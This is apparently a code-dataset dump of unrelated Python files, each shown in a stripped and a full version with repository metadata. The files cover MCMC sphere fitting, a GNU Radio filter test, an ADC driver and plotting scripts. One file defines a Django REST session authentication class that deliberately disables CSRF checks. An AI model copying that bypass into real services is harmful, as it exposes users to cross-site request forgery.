parser.add_argument('--nGrid', action='store', dest='nGrid', type=int, required=False, default=6, help='Not sure')
parser.add_argument('--output_csv_dir', action='store', dest='output_csv_dir', help='Directory to output csv files')
parser.add_argument('--output_json_dir', action='store', dest='output_json_dir', help='Directory to output json files')
parser.add_argument('--output_log', action='store', dest='output_log', help='Output process log file')
parser.add_argument('--plotFigures', action='store', dest='plotFigures', type=bool, required=False, default=False, help='Plot figures')
parser.add_argument('--randomStart', action='store', dest='randomStart', type=bool, required=False, default=True, help='Do not use DEFAULT_MLE_SPHERE_PARAM_DICT')
parser.add_argument("--fixR", action='store', dest='fixR', type=bool, required=False, default=True, help="Not sure")
parser.add_argument('--sample', action='store', dest='sample', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--thin', action='store', dest='thin', type=int, required=False, default=10, help='Not sure')
parser.add_argument('--xTau', action='store', dest='xTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yTau', action='store', dest='yTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zTau', action='store', dest='zTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--rTau', action='store', dest='rTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--xETau', action='store', dest='xETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yETau', action='store', dest='yETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zETau', action='store', dest='zETau', type=float, required=False, default=0.01, help='Not sure')
args = parser.parse_args()
param_dict = get_param_dict(args)
# TODO: nLevelSet = 150
log_fh = open(args.output_log, "w")
for file_name in sorted(os.listdir(args.input_dir)):
file_path = os.path.abspath(os.path.join(args.input_dir, file_name))
# Extract the cell_id from the file name.
cell_id = get_base_file_name(file_name)
# Load or generate synthetic level set data
# if params_dict['genData']:
if False:
# TODO: data = genSphereLevelSet(DEFAULT_MLE_SPHERE_PARAM_DICT, bounding_box, param_dict, nLevelSet)
meanR = [0, 0, 0]
# TODO: save(PrjCtrl.inputFileLevelSetDataM,'data')
else:
data = data_utils.load_raw3d_data(file_path)
log_fh.write("First 5 data points before normalization: {}\n".format(data[:5]))
data, meanR = data_utils.normalize_data(data, log_fh)
log_fh.write("\nFirst 5 data points after normalization: {}\n\n".format(data[:5]))
log_fh.write("mean radius {}".format(meanR))
# TODO: nLevelSet = data.shape[0]
# Set summary parameters
param_ss = param_ss.ParamSS(data.shape[0], meanR)
# Starting value for parameters
if param_dict['randomStart']:
mles_param_dict = mle_sphere.mle_sphere(data, cell_id, param_dict, log_fh)
else:
mles_param_dict = DEFAULT_MLE_SPHERE_PARAM_DICT
# Set Priors
prior = mle_priors_3d.MLEPriors3D(cMean=[mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc']],
cStd=[1, 1, 1],
rMean=mles_param_dict['r'],
rStd=0.1,
eMean=[mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE']],
eStd=[1, 1, 1])
# MCMC Analysis
for n in range(args.burnin + args.sample):
if (np.mod(n, args.thin) == 0 or n == 0):
log_fh.write("\nn {}\n".format(n))
mles_param_dict['cLogLike'] = metrics.calc_log_like_sphere_mix(mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc'],
mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE'],
mles_param_dict['r'],
data[mles_param_dict['sInGIndex'], :],
mles_param_dict['rSig'])
log_fh.write("\nmles_param_dict:\n")
log_fh.write("cLogLike {}\n".format(mles_param_dict['cLogLike']))
log_fh.write("xc {}\n".format(mles_param_dict['xc']))
log_fh.write("yc {}\n".format(mles_param_dict['yc']))
log_fh.write("zc {}\n".format(mles_param_dict['zc']))
log_fh.write("r {}\n".format(mles_param_dict['r']))
log_fh.write("xE {}\n".format(mles_param_dict['xE']))
log_fh.write("yE {}\n".format(mles_param_dict['yE']))
log_fh.write("zE {}\n".format(mles_param_dict['zE']))
log_fh.write("rSig {}\n".format(mles_param_dict['rSig']))
if args.plotFigures:
pass
tup = gen_sphere.gen_sphere(data, mles_param_dict, prior, param_dict)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
tup = gen_sphere_grid.gen_sphere_grid(data, mles_param_dict, prior, param_dict, SCALEFACTOR)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
mles_param_dict['rSig'] = gen_r_sig_3d.gen_r_sig_3d(data, mles_param_dict, prior)
mles_param_dict['sInG'], mles_param_dict['sInGIndex'], mles_param_dict['sOutGIndex'] = gen_selection_in_g_3d.gen_selection_in_g_3d(data, mles_param_dict, prior)
if n > args.burnin:
param_ss.set_params(mles_param_dict)
# param_ss = storeParam3D(ParamSS, param_dict)
log_fh.close()
# Summarize Parameter and print reports
param_ss.summarize_params(args.sample)
param_ss.output_csv(args.output_csv_dir, cell_id)
param_ss.output_json(args.output_json_dir, cell_id)
| 49.919075 | 172 | 0.596225 | #!/usr/bin/env python
import argparse
import numpy as np
import os
import data_utils
import mle_sphere
import gen_sphere
import gen_sphere_grid
import gen_r_sig_3d
import gen_selection_in_g_3d
import metrics
import param_ss
import mle_priors_3d
DEFAULT_MLE_SPHERE_PARAM_DICT = dict(xc=0, yc=0, zc=0, r=1, rSig=0.3, xE=1.2, yE=1, zE=0.8)
GRID = np.array([-3, -2, -1, 1, 2, 3])
SCALEFACTOR = 1
def get_bounding_box_dict():
bounding_box_dict = {}
# xMin, xMax
bounding_box_dict['x'] = [-2, 2]
# yMin, yMax
bounding_box_dict['y'] = [-2, 2]
# zMin, zMax
bounding_box_dict['z'] = [-2, 2]
return bounding_box_dict
def get_base_file_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
else:
return base_file_name
def get_param_dict(args):
param_dict = dict(burnin=args.burnin,
fixR=args.fixR,
grid=GRID,
nGrid=args.nGrid,
plotFigures=args.plotFigures,
randomStart=args.randomStart,
rTau=args.rTau,
sample=args.sample,
thin=args.thin,
xETau=args.xETau,
xTau=args.xTau,
yETau=args.yETau,
yTau=args.yTau,
zETau=args.zETau,
zTau=args.zTau)
return param_dict
parser = argparse.ArgumentParser()
parser.add_argument('--burnin', action='store', dest='burnin', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--input_dir', action='store', dest='input_dir', help='Directory of input csv image point files')
parser.add_argument('--nGrid', action='store', dest='nGrid', type=int, required=False, default=6, help='Not sure')
parser.add_argument('--output_csv_dir', action='store', dest='output_csv_dir', help='Directory to output csv files')
parser.add_argument('--output_json_dir', action='store', dest='output_json_dir', help='Directory to output json files')
parser.add_argument('--output_log', action='store', dest='output_log', help='Output process log file')
parser.add_argument('--plotFigures', action='store', dest='plotFigures', type=bool, required=False, default=False, help='Plot figures')
parser.add_argument('--randomStart', action='store', dest='randomStart', type=bool, required=False, default=True, help='Do not use DEFAULT_MLE_SPHERE_PARAM_DICT')
parser.add_argument("--fixR", action='store', dest='fixR', type=bool, required=False, default=True, help="Not sure")
parser.add_argument('--sample', action='store', dest='sample', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--thin', action='store', dest='thin', type=int, required=False, default=10, help='Not sure')
parser.add_argument('--xTau', action='store', dest='xTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yTau', action='store', dest='yTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zTau', action='store', dest='zTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--rTau', action='store', dest='rTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--xETau', action='store', dest='xETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yETau', action='store', dest='yETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zETau', action='store', dest='zETau', type=float, required=False, default=0.01, help='Not sure')
args = parser.parse_args()
param_dict = get_param_dict(args)
# TODO: nLevelSet = 150
log_fh = open(args.output_log, "w")
for file_name in sorted(os.listdir(args.input_dir)):
file_path = os.path.abspath(os.path.join(args.input_dir, file_name))
# Extract the cell_id from the file name.
cell_id = get_base_file_name(file_name)
# Load or generate synthetic level set data
# if params_dict['genData']:
if False:
# TODO: data = genSphereLevelSet(DEFAULT_MLE_SPHERE_PARAM_DICT, bounding_box, param_dict, nLevelSet)
meanR = [0, 0, 0]
# TODO: save(PrjCtrl.inputFileLevelSetDataM,'data')
else:
data = data_utils.load_raw3d_data(file_path)
log_fh.write("First 5 data points before normalization: {}\n".format(data[:5]))
data, meanR = data_utils.normalize_data(data, log_fh)
log_fh.write("\nFirst 5 data points after normalization: {}\n\n".format(data[:5]))
log_fh.write("mean radius {}".format(meanR))
# TODO: nLevelSet = data.shape[0]
# Set summary parameters
param_ss = param_ss.ParamSS(data.shape[0], meanR)
# Starting value for parameters
if param_dict['randomStart']:
mles_param_dict = mle_sphere.mle_sphere(data, cell_id, param_dict, log_fh)
else:
mles_param_dict = DEFAULT_MLE_SPHERE_PARAM_DICT
# Set Priors
prior = mle_priors_3d.MLEPriors3D(cMean=[mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc']],
cStd=[1, 1, 1],
rMean=mles_param_dict['r'],
rStd=0.1,
eMean=[mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE']],
eStd=[1, 1, 1])
# MCMC Analysis
for n in range(args.burnin + args.sample):
if (np.mod(n, args.thin) == 0 or n == 0):
log_fh.write("\nn {}\n".format(n))
mles_param_dict['cLogLike'] = metrics.calc_log_like_sphere_mix(mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc'],
mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE'],
mles_param_dict['r'],
data[mles_param_dict['sInGIndex'], :],
mles_param_dict['rSig'])
log_fh.write("\nmles_param_dict:\n")
log_fh.write("cLogLike {}\n".format(mles_param_dict['cLogLike']))
log_fh.write("xc {}\n".format(mles_param_dict['xc']))
log_fh.write("yc {}\n".format(mles_param_dict['yc']))
log_fh.write("zc {}\n".format(mles_param_dict['zc']))
log_fh.write("r {}\n".format(mles_param_dict['r']))
log_fh.write("xE {}\n".format(mles_param_dict['xE']))
log_fh.write("yE {}\n".format(mles_param_dict['yE']))
log_fh.write("zE {}\n".format(mles_param_dict['zE']))
log_fh.write("rSig {}\n".format(mles_param_dict['rSig']))
if args.plotFigures:
pass
tup = gen_sphere.gen_sphere(data, mles_param_dict, prior, param_dict)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
tup = gen_sphere_grid.gen_sphere_grid(data, mles_param_dict, prior, param_dict, SCALEFACTOR)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
mles_param_dict['rSig'] = gen_r_sig_3d.gen_r_sig_3d(data, mles_param_dict, prior)
mles_param_dict['sInG'], mles_param_dict['sInGIndex'], mles_param_dict['sOutGIndex'] = gen_selection_in_g_3d.gen_selection_in_g_3d(data, mles_param_dict, prior)
if n > args.burnin:
param_ss.set_params(mles_param_dict)
# param_ss = storeParam3D(ParamSS, param_dict)
log_fh.close()
# Summarize Parameter and print reports
param_ss.summarize_params(args.sample)
param_ss.output_csv(args.output_csv_dir, cell_id)
param_ss.output_json(args.output_json_dir, cell_id)
| 1,085 | 0 | 69 |
e8550a5932930f1b2d7a5aff94124ea076b04b7a | 2,208 | py | Python | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | 1 | 2021-03-09T07:32:37.000Z | 2021-03-09T07:32:37.000Z | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | null | null | null | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, filter, blocks
import math
if __name__ == '__main__':
gr_unittest.run(test_hilbert, "test_hilbert.xml")
| 30.246575 | 73 | 0.658967 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, filter, blocks
import math
def sig_source_f(samp_rate, freq, amp, N):
t = map(lambda x: float(x)/samp_rate, xrange(N))
y = map(lambda x: math.sin(2.*math.pi*freq*x), t)
return y
def fir_filter(x, taps):
y = []
x2 = (len(taps)-1)*[0,] + x
delay = (len(taps)-1)/2
for i in range(len(x)):
yi = 0
for j in range(len(taps)):
yi += taps[len(taps)-1-j] * x2[i+j]
y.append(complex(x2[i+delay], yi))
return y
class test_hilbert(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block ()
def tearDown(self):
self.tb = None
def test_hilbert(self):
tb = self.tb
ntaps = 51
sampling_freq = 100
N = int(ntaps + sampling_freq * 0.10)
data = sig_source_f(sampling_freq, sampling_freq * 0.10, 1.0, N)
src1 = blocks.vector_source_f(data)
taps = filter.firdes.hilbert(ntaps, filter.firdes.WIN_HAMMING)
expected_result = fir_filter(data, taps)
hilb = filter.hilbert_fc(ntaps)
dst1 = blocks.vector_sink_c()
tb.connect(src1, hilb)
tb.connect(hilb, dst1)
tb.run()
dst_data = dst1.data()
self.assertComplexTuplesAlmostEqual(expected_result, dst_data, 5)
if __name__ == '__main__':
gr_unittest.run(test_hilbert, "test_hilbert.xml")
| 1,066 | 20 | 150 |
a195a12bcbb2de73d5ba7db88a8a27392864dc58 | 1,539 | py | Python | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | reagent/net_builder/discrete_actor_net_builder.py | wall-ed-coder/ReAgent | 14d9906d74f943e74c6a6f95d129e18741168f9c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import abc
from typing import List
import torch
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.registry_meta import RegistryMeta
from reagent.models.base import ModelBase
from reagent.parameters import NormalizationData
from reagent.prediction.predictor_wrapper import ActorWithPreprocessor
from reagent.preprocessing.preprocessor import Preprocessor
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.fb_predictor_wrapper import (
FbActorPredictorWrapper as ActorPredictorWrapper,
)
else:
from reagent.prediction.predictor_wrapper import ActorPredictorWrapper
class DiscreteActorNetBuilder(metaclass=RegistryMeta):
"""
Base class for discrete actor net builder.
"""
@abc.abstractmethod
def build_serving_module(
self,
actor: ModelBase,
state_normalization_data: NormalizationData,
action_feature_ids: List[int],
) -> torch.nn.Module:
"""
Returns a TorchScript predictor module
"""
state_preprocessor = Preprocessor(
state_normalization_data.dense_normalization_parameters, use_gpu=False
)
actor_with_preprocessor = ActorWithPreprocessor(
actor.cpu_model().eval(),
state_preprocessor,
)
return ActorPredictorWrapper(actor_with_preprocessor, action_feature_ids)
| 28.5 | 82 | 0.725796 | #!/usr/bin/env python3
import abc
from typing import List
import torch
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.registry_meta import RegistryMeta
from reagent.models.base import ModelBase
from reagent.parameters import NormalizationData
from reagent.prediction.predictor_wrapper import ActorWithPreprocessor
from reagent.preprocessing.preprocessor import Preprocessor
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.fb_predictor_wrapper import (
FbActorPredictorWrapper as ActorPredictorWrapper,
)
else:
from reagent.prediction.predictor_wrapper import ActorPredictorWrapper
class DiscreteActorNetBuilder(metaclass=RegistryMeta):
"""
Base class for discrete actor net builder.
"""
@abc.abstractmethod
def build_actor(
self,
state_normalization_data: NormalizationData,
num_actions: int,
) -> ModelBase:
pass
def build_serving_module(
self,
actor: ModelBase,
state_normalization_data: NormalizationData,
action_feature_ids: List[int],
) -> torch.nn.Module:
"""
Returns a TorchScript predictor module
"""
state_preprocessor = Preprocessor(
state_normalization_data.dense_normalization_parameters, use_gpu=False
)
actor_with_preprocessor = ActorWithPreprocessor(
actor.cpu_model().eval(),
state_preprocessor,
)
return ActorPredictorWrapper(actor_with_preprocessor, action_feature_ids)
| 121 | 0 | 26 |
5af783943b8c376293c1b3b150c9dca00877a8eb | 668 | py | Python | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | 1 | 2021-07-13T14:35:21.000Z | 2021-07-13T14:35:21.000Z | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | null | null | null | 6 semester/Computer graphics/lab7.2.py | vladtsap/study | 87bc1aae4db67fdc18d5203f4e2af1dee1220ec5 | [
"MIT"
] | null | null | null | show_process = False
iterations = 50
import turtle
if not show_process:
turtle.tracer(0)
turtle.colormode(255)
turtle.color((0, 150, 0))
turtle.penup()
turtle.goto(-330, 0)
turtle.pendown()
fern(iterations)
turtle.update()
turtle.exitonclick()
| 17.128205 | 36 | 0.535928 | show_process = False
iterations = 50
import turtle
if not show_process:
turtle.tracer(0)
def fern(length):
if length <= 0.50:
turtle.fd(length)
turtle.bk(length)
else:
turtle.fd(length)
turtle.lt(90)
fern(length * 0.35)
turtle.rt(180)
fern(length * 0.35)
turtle.lt(90)
turtle.lt(3)
fern(length * 0.87)
turtle.rt(3)
turtle.bk(length)
turtle.colormode(255)
turtle.color((0, 150, 0))
turtle.penup()
turtle.goto(-330, 0)
turtle.pendown()
fern(iterations)
turtle.update()
turtle.exitonclick()
| 370 | 0 | 25 |
ba33f9c40a30d9716e2192d6b3a8e6d34446b9b5 | 282 | py | Python | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Crowdgezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 4 | 2016-07-22T07:20:31.000Z | 2016-11-13T18:13:34.000Z | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Strassengezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 402 | 2016-04-26T08:38:17.000Z | 2022-03-11T23:26:49.000Z | crowdgezwitscher/crowdgezwitscher/auth.py | Strassengezwitscher/Crowdgezwitscher | afdd433acb35c1a554ba79464b744975de065151 | [
"MIT"
] | 1 | 2018-01-14T16:58:57.000Z | 2018-01-14T16:58:57.000Z | # source: https://stackoverflow.com/a/30875830
from rest_framework.authentication import SessionAuthentication
| 31.333333 | 68 | 0.804965 | # source: https://stackoverflow.com/a/30875830
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication(SessionAuthentication):
def enforce_csrf(self, request):
return # To not perform the csrf check previously happening
| 80 | 40 | 50 |
8e2e46cf37ae73b3ff79a8eddbcfb3b598dec0c0 | 51 | py | Python | nbmolviz/base/__init__.py | jparkhill/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 55 | 2016-07-21T23:25:59.000Z | 2022-02-14T01:04:49.000Z | nbmolviz/base/__init__.py | jparkhill/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 40 | 2016-07-26T20:57:04.000Z | 2021-09-06T02:31:52.000Z | nbmolviz/base/__init__.py | Autodesk/notebook-molecular-visualization | 2dd61fedcf363d7362b727669b86c5f1c07656fd | [
"Apache-2.0"
] | 18 | 2016-07-25T21:49:02.000Z | 2020-10-03T11:17:03.000Z | from .base_widget import *
from .mdt2json import *
| 17 | 26 | 0.764706 | from .base_widget import *
from .mdt2json import *
| 0 | 0 | 0 |
88ad5ef34c4f5e74c468301747172d1d70c18248 | 1,765 | py | Python | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | library/explorerhat/ads1015.py | DT-was-an-ET/explorer-hat | 9dd8624a094b9a7663fbcbb95be72fdb946eecc7 | [
"MIT"
] | null | null | null | import time
from sys import exit, version_info
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus")
adc_available = True
address = 0x48
i2c = SMBus(i2c_bus_id())
REG_CONV = 0x00
REG_CFG = 0x01
samples_per_second_map = {128: 0x0000, 250: 0x0020, 490: 0x0040, 920: 0x0060, 1600: 0x0080, 2400: 0x00A0, 3300: 0x00C0}
channel_map = {0: 0x4000, 1: 0x5000, 2: 0x6000, 3: 0x7000}
programmable_gain_map = {6144: 0x0000, 4096: 0x0200, 2048: 0x0400, 1024: 0x0600, 512: 0x0800, 256: 0x0A00}
PGA_6_144V = 6144
PGA_4_096V = 4096
PGA_2_048V = 2048
PGA_1_024V = 1024
PGA_0_512V = 512
PGA_0_256V = 256
try:
read_se_adc()
except IOError:
adc_available = False
| 27.153846 | 119 | 0.692918 | import time
from sys import exit, version_info
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus")
adc_available = True
def i2c_bus_id():
revision = ([l[12:-1] for l in open('/proc/cpuinfo', 'r').readlines() if l[:8] == "Revision"] + ['0000'])[0]
return 1 if int(revision, 16) >= 4 else 0
address = 0x48
i2c = SMBus(i2c_bus_id())
REG_CONV = 0x00
REG_CFG = 0x01
samples_per_second_map = {128: 0x0000, 250: 0x0020, 490: 0x0040, 920: 0x0060, 1600: 0x0080, 2400: 0x00A0, 3300: 0x00C0}
channel_map = {0: 0x4000, 1: 0x5000, 2: 0x6000, 3: 0x7000}
programmable_gain_map = {6144: 0x0000, 4096: 0x0200, 2048: 0x0400, 1024: 0x0600, 512: 0x0800, 256: 0x0A00}
PGA_6_144V = 6144
PGA_4_096V = 4096
PGA_2_048V = 2048
PGA_1_024V = 1024
PGA_0_512V = 512
PGA_0_256V = 256
def read_se_adc(channel=1, programmable_gain=PGA_6_144V, samples_per_second=1600):
# sane defaults
config = 0x0003 | 0x0100
config |= samples_per_second_map[samples_per_second]
config |= channel_map[channel]
config |= programmable_gain_map[programmable_gain]
# set "single shot" mode
config |= 0x8000
# write single conversion flag
i2c.write_i2c_block_data(address, REG_CFG, [(config >> 8) & 0xFF, config & 0xFF])
delay = (1.0 / samples_per_second) + 0.0001
time.sleep(delay)
data = i2c.read_i2c_block_data(address, REG_CONV)
return (((data[0] << 8) | data[1]) >> 4) * programmable_gain / 2048.0 / 1000.0
try:
read_se_adc()
except IOError:
adc_available = False
| 796 | 0 | 46 |
7c12abd47a52ad7e02410a984ccfe624d0b9deeb | 230 | py | Python | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | pyvolt/types/category.py | Gael-devv/Pyvolt | 1d84ba95f1fd3f959a933051c25f8a3e60500c5d | [
"MIT"
] | null | null | null | from typing import TYPE_CHECKING, TypedDict
if TYPE_CHECKING:
from .snowflake import Snowflake, SnowflakeList
__all__ = ("Category",)
| 17.692308 | 51 | 0.743478 | from typing import TYPE_CHECKING, TypedDict
if TYPE_CHECKING:
from .snowflake import Snowflake, SnowflakeList
__all__ = ("Category",)
class Category(TypedDict):
id: Snowflake
title: str
channels: SnowflakeList
| 0 | 66 | 23 |
7076ef271d06a797450c907543f266df5539f478 | 841 | py | Python | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | test/digits_1112.py | Radenz/my-convex-hull | e887d84dd646ae046b10633218d0bf9b266fb8f6 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from myConvexHull import convex_hull, random_color
from myConvexHull.point_utils import X, Y
data = datasets.load_digits()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['Target'] = pd.DataFrame(data.target)
plt.figure(figsize=(10, 6))
plt.title('Pixel [1, 3] vs Pixel [1, 4]')
plt.xlabel(data.feature_names[11])
plt.ylabel(data.feature_names[12])
for i in range(len(data.target_names)):
bucket = df[df['Target'] == i]
bucket = bucket.iloc[:, [11, 12]].values
hull = convex_hull(bucket)
color = random_color()
plt.scatter(bucket[:, 0], bucket[:, 1],
label=data.target_names[i], color=color)
hull = np.transpose(hull)
plt.plot(hull[X], hull[Y], color=color)
plt.legend()
plt.show()
| 30.035714 | 56 | 0.699168 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from myConvexHull import convex_hull, random_color
from myConvexHull.point_utils import X, Y
data = datasets.load_digits()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['Target'] = pd.DataFrame(data.target)
plt.figure(figsize=(10, 6))
plt.title('Pixel [1, 3] vs Pixel [1, 4]')
plt.xlabel(data.feature_names[11])
plt.ylabel(data.feature_names[12])
for i in range(len(data.target_names)):
bucket = df[df['Target'] == i]
bucket = bucket.iloc[:, [11, 12]].values
hull = convex_hull(bucket)
color = random_color()
plt.scatter(bucket[:, 0], bucket[:, 1],
label=data.target_names[i], color=color)
hull = np.transpose(hull)
plt.plot(hull[X], hull[Y], color=color)
plt.legend()
plt.show()
| 0 | 0 | 0 |
89a1617fe951435594bb047f64e8489024798ba7 | 497 | py | Python | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 2 | 2021-04-23T19:18:06.000Z | 2021-05-15T17:45:21.000Z | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 1 | 2021-05-14T00:29:23.000Z | 2021-05-14T00:29:23.000Z | World 1/Modules/ex020 - Choosing a Order.py | MiguelChichorro/PythonExercises | 3b2726e7d9ef92c1eb6b977088692c42a2a7b86e | [
"MIT"
] | 1 | 2021-05-14T00:19:33.000Z | 2021-05-14T00:19:33.000Z | from random import sample
from time import sleep
colors = {"clean": "\033[m",
"red": "\033[31m",
"green": "\033[32m",
"yellow": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cian": "\033[36m"}
order = ["Breno", "Edu", "Miguel", "Lucas"]
print("{}Hmm...let me see{}".format(colors["cian"], colors["clean"]))
sleep(2)
print("The presentation order is {}{}{} "
.format(colors["yellow"], sample(order, k=4), colors["clean"]))
| 33.133333 | 69 | 0.527163 | from random import sample
from time import sleep
colors = {"clean": "\033[m",
"red": "\033[31m",
"green": "\033[32m",
"yellow": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cian": "\033[36m"}
order = ["Breno", "Edu", "Miguel", "Lucas"]
print("{}Hmm...let me see{}".format(colors["cian"], colors["clean"]))
sleep(2)
print("The presentation order is {}{}{} "
.format(colors["yellow"], sample(order, k=4), colors["clean"]))
| 0 | 0 | 0 |
d96784146bd766dcccea9ce0e829666670d8dddd | 2,689 | py | Python | video_background_dynamic_mode_decomposition_582HW5/subtractLRvideo.py | aruymgaart/AMATH | 87579a076ec74094d0420c2a1f477022aaefb6bc | [
"MIT"
